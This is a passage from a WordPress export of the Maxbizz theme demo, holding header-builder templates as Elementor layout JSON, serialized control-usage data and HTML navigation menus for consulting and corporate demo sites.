0.19)","hover_color":"#FFFFFF","button_background_hover_color":"#FF8F3E","border_border":"solid","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"#FF8F3E","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"text_padding":{"unit":"px","top":"16","right":"29","bottom":"16","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"58","isLinked":false},"typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"a79077e","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#272933","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed"},"elements":[{"id":"3c16631","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"471e1f7","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#FE8423","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""}},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"c60b06b","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"1ca8a66","elType":"widget","settings":{"icon_color":"#FFFFFF"},"elements":[],"widgetType":"icart"},{"id":"a1e6544","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isearch"},{"id":"f2c8f30","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:17:"_ot_content_align";i:2;s:5:"align";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:2;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:2;s:16:"description_text";i:2;s:8:"position";i:2;s:10:"title_size";i:2;s:13:"selected_icon";i:2;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:2;s:9:"icon_size";i:2;s:6:"rotate";i:2;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:2;s:18:"title_bottom_space";i:2;s:27:"title_typography_typography";i:2;s:26:"title_typography_font_size";i:2;s:28:"title_typography_font_weight";i:2;s:33:"description_typography_typography";i:2;s:32:"description_typography_font_size";i:2;s:34:"description_typography_font_weight";i:2;s:11:"title_color";i:2;s:28:"title_typography_font_family";i:2;s:17:"description_color";i:2;s:34:"description_typography_font_family";i:2;s:28:"title_typography_line_height";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:12:{s:21:"typography_typography";i:1;s:22:"typography_font_weight";i:1;s:17:"button_text_color";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:1:{s:12:"sticky_class";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:2:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Left</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-mobile/</link>
		<pubDate>Fri, 22 May 2020 10:22:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=77</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-corporate/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="Maxbizz Corporate">
				</a>			        
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    														
					<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1703"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1704"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1748"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/about-us/">About Us</a></li>
	<li id="menu-item-1770"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Our Services 1</a></li>
	<li id="menu-item-1765"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1754"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1755"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/">Our Team</a></li>
	<li id="menu-item-1756"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1752"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/elements/">Elements</a></li>
	<li id="menu-item-1757"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/typography/">Typography</a></li>
	<li id="menu-item-1753"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/faqs/">FAQs</a></li>
	<li id="menu-item-1749"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/404-2/">404</a></li>
	<li id="menu-item-1750"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1768"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1771"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1769"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1767"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1774"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1766"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Services</a>
<ul>
	<li id="menu-item-1764"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1763"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1762"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1761"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1760"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1759"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1758"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog</a>
<ul>
	<li id="menu-item-1772"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog List</a></li>
	<li id="menu-item-1773"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1751"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/contacts/">Contacts</a></li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>77</wp:post_id>
		<wp:post_date><![CDATA[2020-05-22 10:22:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-22 10:22:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"e7c1045","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"background_background":"classic","background_color":"#282828"},"elements":[{"id":"026b8ab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"447392a","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1776},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"172f4fe","elType":"column","settings":{"_column_size":50,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":60},"elements":[{"id":"0514b95","elType":"widget","settings":{"icon_color":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f14cf6b","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-22]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:2;s:19:"_inline_size_mobile";i:2;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:2:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-2/</link>
		<pubDate>Thu, 23 Jul 2020 03:53:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=106</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
					<ul>
							<li>
													
										Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							

	
		
	

						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							

	
		
	

						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    														
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts">free quote</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>106</wp:post_id>
		<wp:post_date><![CDATA[2020-07-23 03:53:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-23 03:53:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"cc784fd","elType":"section","settings":{"layout":"full_width","content_position":"middle","structure":"21","background_background":"classic","background_color":"#262832","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"1d738b2","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"32895ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","item_icon_secondary_color":"#FFFFFF","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","_padding":{"unit":"px","top":"7","right":"0","bottom":"7","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#18A6F0","hover_border_color":"#18A6F0","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"78dcf95","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"c94f846","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_align":"right","icon_color":"#4B83FC","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"8","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"}],"isInner":false}],"isInner":false},{"id":"37d086b","elType":"section","settings":{"layout":"full_width","structure":"33","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.09)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false},"sticky_class":"is-fixed","sticky_background":"#FFFFFF"},"elements":[{"id":"d44a756","elType":"column","settings":{"_column_size":25,"_inline_size":18.047000000000000596855898038484156131744384765625},"elements":[{"id":"76a2789","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"26","right":"0","bottom":"28","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"a71a42c","elType":"column","settings":{"_column_size":50,"_inline_size":63.90599999999999880628820392303168773651123046875,"content_position":"center","align":"center","_ot_content_align":"horizontal","margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true}},"elements":[{"id":"a6322eb","elType":"widget","settings":{"nav_menu":"main-menu","space_item":{"unit":"px","size":29,"sizes":[]},"text_hover_color":"#4B82FB","_margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"menu_typography_typography":"custom","menu_typography_font_size":{"unit":"px","size":14,"sizes":[]},"menu_typography_font_weight":"700","smenu_typography_typography":"custom"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"990f116","elType":"column","settings":{"_column_size":25,"_inline_size":18.0270000000000010231815394945442676544189453125,"align":"flex-end","_ot_content_align":"horizontal","_ot_column_min_width":{"unit":"px","size":260,"sizes":[]},"content_position":"center"},"elements":[{"id":"3ea33c9","elType":"widget","settings":{"bg_btn":"#4B83FC","_margin":{"unit":"px","top":"0","right":"40","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f41aa01","elType":"widget","settings":{"text":"free quote","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts","is_external":"","nofollow":"","custom_attributes":""},"btn_bg":"#4A81F9"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:2:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:16:"content_position";i:2;s:5:"align";i:2;s:17:"_ot_content_align";i:2;s:20:"_ot_column_min_width";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:2:{s:13:"space_between";i:1;s:10:"icon_align";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}